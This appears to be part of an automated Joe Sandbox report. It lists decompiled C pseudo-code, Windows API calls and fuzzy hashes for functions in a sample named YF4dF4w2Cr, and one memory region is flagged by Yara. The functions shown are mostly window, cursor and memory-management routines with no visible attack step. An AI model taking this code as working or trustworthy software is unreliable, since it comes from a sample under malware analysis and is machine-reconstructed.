                  						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
                  						SendMessageA( *(_t27 + 0x20), 0x86, 1, 0);
                  						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
                  					}
                  				}
                  				_push(5);
                  				_push(GetDesktopWindow());
                  				while(1) {
                  					_t20 = GetWindow();
                  					_t36 = _t20;
                  					if(_t36 == 0) {
                  						break;
                  					}
                  					_t21 = E00408105( *(_t27 + 0x20), _t36);
                  					__eflags = _t21;
                  					if(_t21 != 0) {
                  						SendMessageA(_t36, 0x36d, _a4, 0);
                  					}
                  					_push(2);
                  					_push(_t36);
                  				}
                  				return _t20;
                  			}















                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00408AD0
                  • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00408AE7
                  • GetDesktopWindow.USER32 ref: 00408AEB
                  • SendMessageA.USER32(00000000,0000036D,0000000C,00000000), ref: 00408B0C
                  • GetWindow.USER32(00000000), ref: 00408B11
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$DesktopLong
                  • String ID:
                  • API String ID: 2272707703-0
                  • Opcode ID: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction ID: d32bd3ced13832ff189fd8f6ba1fa6c44edaf74d9e9f2573400e8018fbc2a9f8
                  • Opcode Fuzzy Hash: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction Fuzzy Hash: 3B11D03130071577EB316B568E46F9B3A19AF40764F16403FBA82796D1CEF9D8018EAC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E00409299(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags, struct HWND__* _a4, unsigned int _a8) {
                  				signed int _v8;
                  				char _v268;
                  				struct HWND__* _v272;
                  				intOrPtr _v276;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t22;
                  				int _t28;
                  				unsigned int _t48;
                  				intOrPtr _t51;
                  				void* _t54;
                  				intOrPtr _t55;
                  				intOrPtr _t56;
                  				signed int _t60;
                  
                  				_t52 = __edi;
                  				_t51 = __edx;
                  				_t42 = __ebx;
                  				_t58 = _t60;
                  				_t22 =  *0x463404; // 0x38a11573
                  				_v8 = _t22 ^ _t60;
                  				_push(_t54);
                  				_v276 = __ecx;
                  				_v272 = _a4;
                  				_t55 =  *((intOrPtr*)(E0041F363(__ebx, __edi, _t54, __eflags) + 4));
                  				if(_t55 != 0 && _a8 != 0) {
                  					_t48 = _a8 >> 0x10;
                  					if(_t48 != 0) {
                  						_t28 =  *(_t55 + 0x90) & 0x0000ffff;
                  						if(_a8 == _t28 && _t48 ==  *(_t55 + 0x92)) {
                  							_push(__ebx);
                  							_push(__edi);
                  							GlobalGetAtomNameA(_t28,  &_v268, 0x103);
                  							GlobalAddAtomA( &_v268);
                  							GlobalGetAtomNameA( *(_t55 + 0x92) & 0x0000ffff,  &_v268, 0x103);
                  							GlobalAddAtomA( &_v268);
                  							SendMessageA(_v272, 0x3e4,  *(_v276 + 0x20), ( *(_t55 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t55 + 0x90) & 0x0000ffff);
                  							_pop(_t52);
                  							_pop(_t42);
                  						}
                  					}
                  				}
                  				_pop(_t56);
                  				return E00430650(0, _t42, _v8 ^ _t58, _t51, _t52, _t56);
                  			}


















                  APIs
                  • GlobalGetAtomNameA.KERNEL32 ref: 00409313
                  • GlobalAddAtomA.KERNEL32 ref: 00409322
                  • GlobalGetAtomNameA.KERNEL32 ref: 00409338
                  • GlobalAddAtomA.KERNEL32 ref: 00409341
                  • SendMessageA.USER32(?,000003E4,?,?), ref: 0040936B
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AtomGlobal$Name$MessageSend
                  • String ID:
                  • API String ID: 1515195355-0
                  • Opcode ID: 1c6fcbf13093bb436f0e166c326a3b4a914807bfc1dca102e33d20fd3faa784b
                  • Instruction ID: fae6a2da03322e5916738b78c9740749d301d266a21dc2ce22a06b3a4c8b14c9
                  • Opcode Fuzzy Hash: 1c6fcbf13093bb436f0e166c326a3b4a914807bfc1dca102e33d20fd3faa784b
                  • Instruction Fuzzy Hash: 57216231900118AADB20DF69DC45BEAB3F8FB58700F00456AE99997181D7B8AE80CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00406DB6(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                  				signed short _t24;
                  				unsigned int _t34;
                  				void* _t46;
                  
                  				_t46 = __ecx;
                  				if(IsWindow( *(__ecx + 0x20)) == 0) {
                  					 *(_t46 + 0xb0) = _a4;
                  					 *(_t46 + 0xb4) = _a8;
                  					 *(_t46 + 0xa8) = _a12;
                  					_t24 = _a16;
                  					 *(_t46 + 0xac) = _t24;
                  					return _t24;
                  				}
                  				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                  				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                  				if( *0x462630 >= 0x60000) {
                  					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
                  					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
                  					 *(_t46 + 0xb4) = _t34 >> 0x10;
                  				}
                  				return InvalidateRect( *(_t46 + 0x20), 0, 1);
                  			}







                  APIs
                  • IsWindow.USER32(?), ref: 00406DC1
                  • SendMessageA.USER32(?,00000420,00000000,?), ref: 00406DEC
                  • SendMessageA.USER32(?,0000041F,00000000,?), ref: 00406E05
                  • SendMessageA.USER32(?,0000043A,00000000,00000000), ref: 00406E1D
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00406E37
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateRectWindow
                  • String ID:
                  • API String ID: 3225880595-0
                  • Opcode ID: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction ID: 4717757c02217832fd9b412043661d7cdff3795e995a25a39b476dc6cc087278
                  • Opcode Fuzzy Hash: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction Fuzzy Hash: CD115EB5100318AFE7108F29CC84AB7B7E9FB44344F01452EF99AC2160D7B0AC50DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E00403BB0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                  				intOrPtr _t19;
                  				void* _t35;
                  				intOrPtr _t37;
                  				intOrPtr _t51;
                  				void* _t52;
                  				intOrPtr _t53;
                  				void* _t54;
                  				void* _t55;
                  
                  				_t48 = __edi;
                  				_t35 = __ebx;
                  				_push(__ecx);
                  				_t51 = __ecx;
                  				_t19 =  *((intOrPtr*)(__ecx + 0x70));
                  				 *((intOrPtr*)(__ecx)) = 0x44f12c;
                  				if(_t19 != 0) {
                  					_t47 =  *(_t19 + 0x2c);
                  					if(GetExitCodeThread( *(_t19 + 0x2c), _t55 + 4) != 0 &&  *(_t55 + 4) == 0x103) {
                  						_push(__edi);
                  						SetEvent( *(_t51 + 0xa4));
                  						SetEvent( *(_t51 + 0x9c));
                  						_t47 =  *(_t51 + 0xa8);
                  						WaitForSingleObject( *(_t51 + 0xa8), 0xffffffff);
                  						_pop(_t48);
                  					}
                  				}
                  				_t37 = _t51;
                  				_pop(_t52);
                  				_push(4);
                  				E00431A9B(E0044BAB5, _t35, _t48, _t52);
                  				_t53 = _t37;
                  				 *((intOrPtr*)(_t54 - 0x10)) = _t53;
                  				 *(_t54 - 4) = 3;
                  				E0041CF56(_t37);
                  				if( *((intOrPtr*)(_t53 + 0x28)) != 0) {
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x28)))) + 0x60))(_t53);
                  				}
                  				 *(_t54 - 4) = 2;
                  				E004238A4(_t53 + 0x2c);
                  				E004010B0( *((intOrPtr*)(_t53 + 0x24)) - 0x10, _t47);
                  				E004010B0( *((intOrPtr*)(_t53 + 0x20)) - 0x10, _t47);
                  				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
                  				return E00431B73(E004126F7(_t53));
                  			}












                  APIs
                  • GetExitCodeThread.KERNEL32(?,?), ref: 00403BCA
                  • SetEvent.KERNEL32(?), ref: 00403BEC
                  • SetEvent.KERNEL32(?), ref: 00403BF5
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403C00
                  • __EH_prolog3.LIBCMT ref: 0041D228
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Event$CodeExitH_prolog3ObjectSingleThreadWait
                  • String ID:
                  • API String ID: 2381358199-0
                  • Opcode ID: fa545502d5acbd77844dd176f8f838e760c6e7bb0049e04f7fa1d7d70fb9b361
                  • Instruction ID: 2df0668fb81505498147826c0ba3f82a5f93b319f9ce905dcc0f13ec5cdeb1dd
                  • Opcode Fuzzy Hash: fa545502d5acbd77844dd176f8f838e760c6e7bb0049e04f7fa1d7d70fb9b361
                  • Instruction Fuzzy Hash: 6B11D270600200DBDB14EFB9C854AABB7E8BF48314F00462EF156932D1CBB8A941CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042A16F(void* _a4, void* _a8) {
                  				void* _t7;
                  				DEVMODEA* _t8;
                  				struct HDC__* _t17;
                  				void* _t21;
                  				struct HDC__* _t25;
                  				signed short* _t28;
                  
                  				if(_a4 != 0) {
                  					_t7 = GlobalLock(_a4);
                  					_t21 = _a8;
                  					_t28 = _t7;
                  					if(_t21 == 0) {
                  						_t8 = 0;
                  					} else {
                  						_t8 = GlobalLock(_t21);
                  					}
                  					if(_t28 != 0) {
                  						_t25 = CreateDCA(_t28 + ( *_t28 & 0x0000ffff), _t28 + (_t28[1] & 0x0000ffff), _t28 + (_t28[2] & 0x0000ffff), _t8);
                  						GlobalUnlock(_a4);
                  						if(_t21 != 0) {
                  							GlobalUnlock(_t21);
                  						}
                  						_t17 = _t25;
                  					} else {
                  						_t17 = 0;
                  					}
                  					return _t17;
                  				}
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalLock
                  • String ID:
                  • API String ID: 2848605275-0
                  • Opcode ID: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction ID: 2c7e1155eccb6f0b88d5b3aa029337c93f042f81e7a86a2626123610b555cf53
                  • Opcode Fuzzy Hash: 36197cb4c7bc65c2e10c633eec0bce1bffa3b1a8456a36caaa099f7416d8f53f
                  • Instruction Fuzzy Hash: 8E01D132300635ABC7215B6AEC44A377EDCEF887B1B544422BD49C3600D638CC30D6A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004088DE(void* __ecx) {
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t9;
                  				int _t11;
                  				void* _t13;
                  				void* _t18;
                  				void* _t26;
                  
                  				_t26 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x68)) != 0) {
                  					_t11 = PeekMessageA( &_v32,  *(__ecx + 0x20), 0x367, 0x367, 3);
                  					_t18 = PostMessageA;
                  					if(_t11 == 0) {
                  						PostMessageA( *(_t26 + 0x20), 0x367, 0, 0);
                  					}
                  					if(GetCapture() ==  *(_t26 + 0x20)) {
                  						ReleaseCapture();
                  					}
                  					_t13 = E0040F8D7(_t26);
                  					_t30 = _t13;
                  					if(_t13 == 0) {
                  						_t13 = E00406436(_t18, 0, 0x367, _t26, _t30);
                  					}
                  					 *((intOrPtr*)(_t26 + 0x68)) = 0;
                  					 *((intOrPtr*)(_t13 + 0x68)) = 0;
                  					return PostMessageA( *(_t26 + 0x20), 0x36a, 0, 0);
                  				}
                  				return _t9;
                  			}














                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$CapturePost$PeekRelease
                  • String ID:
                  • API String ID: 1125932295-0
                  • Opcode ID: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction ID: 57fe4fcd219db2e76da600668b61a162516832e2059398302be7d6c9e2b70dbe
                  • Opcode Fuzzy Hash: 63f601fcd40991cd7e0112b5e477cee5bb4eea0abaee055fc0908a0d71d373a2
                  • Instruction Fuzzy Hash: 8A0167755006007FE7257B66DC59F2B7ABDFB85718F10493DF182A22E1EA74EC00C669
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0041BBC8(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, char _a8) {
                  				struct tagPOINT _v12;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t15;
                  				intOrPtr _t18;
                  				intOrPtr _t25;
                  				intOrPtr _t28;
                  				intOrPtr* _t30;
                  
                  				_t25 = __edx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t31 = _a8 - 1;
                  				_t28 = __ecx;
                  				if(_a8 == 1) {
                  					GetCursorPos( &_v12);
                  					ScreenToClient( *(_t28 + 0x20),  &_v12);
                  					__eflags =  *((intOrPtr*)(_t28 + 0x10c)) - 2;
                  					if( *((intOrPtr*)(_t28 + 0x10c)) == 2) {
                  						L7:
                  						_push(LoadCursorA(0, 0x7f00));
                  					} else {
                  						_t18 = E0041B982(_t28, _t25,  &_v12,  &_a8);
                  						__eflags = _t18;
                  						if(_t18 == 0) {
                  							goto L7;
                  						} else {
                  							_t30 = _t28 + 0x120;
                  							__eflags =  *_t30;
                  							if(__eflags == 0) {
                  								 *_t30 = LoadCursorA( *(E0041F363(__ebx, __edi, _t30, __eflags) + 0xc), 0x7902);
                  							}
                  							_push( *_t30);
                  						}
                  					}
                  					SetCursor();
                  					_t15 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t15 = E0040ED96(__ecx, _t31);
                  				}
                  				return _t15;
                  			}












                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Cursor$ClientLoadScreen
                  • String ID:
                  • API String ID: 120721131-0
                  • Opcode ID: fb1ddc07927ca9ebcf9fd8110f4b45202ba53c99b5186e5047645b8d000ed84a
                  • Instruction ID: 0d910c33cf9fb54be0f59747509cc5bad96e2f9c52cf35ee929d1a0e5e03e210
                  • Opcode Fuzzy Hash: fb1ddc07927ca9ebcf9fd8110f4b45202ba53c99b5186e5047645b8d000ed84a
                  • Instruction Fuzzy Hash: 32015E75514209EFDB209BA1CC09EDA77ACFF05315F00446AF546D2250EB789984CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0041B503(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t31;
                  				struct HICON__** _t38;
                  				intOrPtr _t40;
                  				void* _t41;
                  
                  				_push(4);
                  				E00431A9B(E0044B922, __ebx, __edi, __esi);
                  				_t40 = __ecx;
                  				 *((intOrPtr*)(_t41 - 0x10)) = __ecx;
                  				 *((intOrPtr*)(__ecx)) = 0x452d9c;
                  				_t26 = __ecx + 0x94;
                  				 *(_t41 - 4) = 1;
                  				E00422DD3(__ecx + 0x94, __ecx + 0x94);
                  				_t29 =  *((intOrPtr*)(_t40 + 0x134));
                  				_t43 =  *((intOrPtr*)(_t40 + 0x134));
                  				if( *((intOrPtr*)(_t40 + 0x134)) != 0) {
                  					E0041B323(_t29, __edx, _t43, 1);
                  				}
                  				E00404490(_t26, 1, _t40, _t43,  *((intOrPtr*)(_t40 + 0xa8)));
                  				_t31 =  *((intOrPtr*)(_t40 + 0x90));
                  				if(_t31 != 0) {
                  					 *((intOrPtr*)( *_t31 + 4))(1);
                  				}
                  				_t38 = _t40 + 0x120;
                  				if( *_t38 != 0) {
                  					SetCursor(LoadCursorA(0, 0x7f00));
                  					DestroyCursor( *_t38);
                  				}
                  				 *(_t41 - 4) = 0;
                  				E00422E06(_t26);
                  				 *(_t41 - 4) =  *(_t41 - 4) | 0xffffffff;
                  				return E00431B73(E00418FC1(_t40, _t40,  *(_t41 - 4)));
                  			}








                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Cursor$DestroyH_prolog3Loadctype
                  • String ID:
                  • API String ID: 2718315270-0
                  • Opcode ID: 646ec8a41c06d257c62a63bec00b84e5baa048c7e2c4ba5cb98eaab41f205f7f
                  • Instruction ID: 09b58abaf18f10ba53531755bae239b5462338189d74af3cd0587c3cfb6ebcff
                  • Opcode Fuzzy Hash: 646ec8a41c06d257c62a63bec00b84e5baa048c7e2c4ba5cb98eaab41f205f7f
                  • Instruction Fuzzy Hash: 2401C030600301EBCB15AF769944BADB7B1BF49305F00456EF05A972A1CB781A418B4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 41%
                  			E004316F6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t10;
                  				intOrPtr _t13;
                  				intOrPtr _t23;
                  				void* _t25;
                  
                  				_push(0xc);
                  				_push(0x45df00);
                  				_t8 = E00431818(__ebx, __edi, __esi);
                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                  				if(_t23 == 0) {
                  					L9:
                  					return E0043185D(_t8);
                  				}
                  				if( *0x468784 != 3) {
                  					_push(_t23);
                  					L7:
                  					_t8 = HeapFree( *0x466eac, 0, ??);
                  					_t31 = _t8;
                  					if(_t8 == 0) {
                  						_t10 = E00431D3E(_t31);
                  						 *_t10 = E00431CFC(GetLastError());
                  					}
                  					goto L9;
                  				}
                  				E0043A0BF(__ebx, 4);
                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                  				_t13 = E0043A0F2(_t23);
                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                  				if(_t13 != 0) {
                  					_push(_t23);
                  					_push(_t13);
                  					E0043A122();
                  				}
                  				 *(_t25 - 4) = 0xfffffffe;
                  				_t8 = E0043174C();
                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                  					goto L9;
                  				} else {
                  					_push( *((intOrPtr*)(_t25 + 8)));
                  					goto L7;
                  				}
                  			}








                  APIs
                  • __lock.LIBCMT ref: 00431714
                    • Part of subcall function 0043A0BF: __mtinitlocknum.LIBCMT ref: 0043A0D5
                    • Part of subcall function 0043A0BF: __amsg_exit.LIBCMT ref: 0043A0E1
                    • Part of subcall function 0043A0BF: EnterCriticalSection.KERNEL32(0043611B,0043611B,?,0043DC06,00000004,0045E368,0000000C,004381EC,00000001,0043612A,00000000,00000000,00000000,?,0043612A,00000001), ref: 0043A0E9
                  • ___sbh_find_block.LIBCMT ref: 0043171F
                  • ___sbh_free_block.LIBCMT ref: 0043172E
                  • HeapFree.KERNEL32(00000000,00000001,0045DF00,0000000C,0043A0A0,00000000,0045E2A8,0000000C,0043A0DA,00000001,0043611B,?,0043DC06,00000004,0045E368,0000000C), ref: 0043175E
                  • GetLastError.KERNEL32(?,0043DC06,00000004,0045E368,0000000C,004381EC,00000001,0043612A,00000000,00000000,00000000,?,0043612A,00000001,00000214), ref: 0043176F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 9dc04b9689af2bf82a866fb0a8e1f056a8570705746ff3f69382913c185bb473
                  • Instruction ID: d3813c98c3fd1d5aeb6149d0b7521c20993e54d6c63caead87b5699286848da1
                  • Opcode Fuzzy Hash: 9dc04b9689af2bf82a866fb0a8e1f056a8570705746ff3f69382913c185bb473
                  • Instruction Fuzzy Hash: DD012631941201AADF343FB29C0AB1E3764AF09328F24602FF400671B1EF7C88408B9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0231A8F0: CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0231A930
                  • WaitForSingleObject.KERNEL32(00000000,?,00000000,0231AC6C), ref: 0231AA10
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,0231AC6C), ref: 0231AA44
                  • ResetEvent.KERNEL32(?,00000000,0231AC6C), ref: 0231AA58
                  • ReleaseMutex.KERNEL32(?,00000000,0231AC6C), ref: 0231AA66
                  • CloseHandle.KERNEL32(?,00000000,0231AC6C), ref: 0231AA72
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle
                  • String ID:
                  • API String ID: 3891338068-0
                  • Opcode ID: 6cd49328ec676c2f2531ba3af4da5c50d825bc0f91aa981eef4cd55127dee8a5
                  • Instruction ID: 10313f8e304c718267b0410bf0424a4779bd7a5ebff783347889a535e2e88d23
                  • Opcode Fuzzy Hash: 6cd49328ec676c2f2531ba3af4da5c50d825bc0f91aa981eef4cd55127dee8a5
                  • Instruction Fuzzy Hash: 97F04471A831159BDB3D1765BE086163A7EEB54362F16492AE845D00A0EB21CC6DCE61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00420BAF(long* __ecx) {
                  				intOrPtr _t4;
                  				long _t5;
                  				void* _t6;
                  				void* _t13;
                  				intOrPtr _t14;
                  				long* _t15;
                  
                  				_t15 = __ecx;
                  				_t4 =  *((intOrPtr*)(__ecx + 0x14));
                  				if(_t4 != 0) {
                  					do {
                  						_t14 =  *((intOrPtr*)(_t4 + 4));
                  						E004209F9(__ecx, _t4, 0);
                  						_t4 = _t14;
                  					} while (_t14 != 0);
                  				}
                  				_t5 =  *_t15;
                  				if(_t5 != 0xffffffff) {
                  					TlsFree(_t5);
                  				}
                  				_t6 = _t15[4];
                  				if(_t6 != 0) {
                  					_t13 = GlobalHandle(_t6);
                  					GlobalUnlock(_t13);
                  					_t6 = GlobalFree(_t13);
                  				}
                  				DeleteCriticalSection( &(_t15[7]));
                  				return _t6;
                  			}










                  APIs
                  • TlsFree.KERNEL32(?,?,?,00420C15), ref: 00420BD7
                  • GlobalHandle.KERNEL32 ref: 00420BE5
                  • GlobalUnlock.KERNEL32(00000000,?,?,00420C15), ref: 00420BEE
                  • GlobalFree.KERNEL32 ref: 00420BF5
                  • DeleteCriticalSection.KERNEL32(?,?,?,00420C15), ref: 00420BFF
                    • Part of subcall function 004209F9: EnterCriticalSection.KERNEL32(00466584,00000000,00466568,00466584,00466568,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                    • Part of subcall function 004209F9: LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                    • Part of subcall function 004209F9: LocalFree.KERNEL32(?,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                    • Part of subcall function 004209F9: TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                  • String ID:
                  • API String ID: 1549993015-0
                  • Opcode ID: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction ID: 3e9e6558ba584311e6215c2e42c48fddda6ce4580923e77d2502095fd869f7fc
                  • Opcode Fuzzy Hash: 2524a9e4b8455a07e4bf32045e7696a10aebff71af30ea1339fde83c2f1fefcc
                  • Instruction Fuzzy Hash: 10F0903A3002205BD3215B6ABC4CE1B3AE9BF867643550669F955D3252CB64EC028668
                  Uniqueness

                  Uniqueness Score: -1.00%

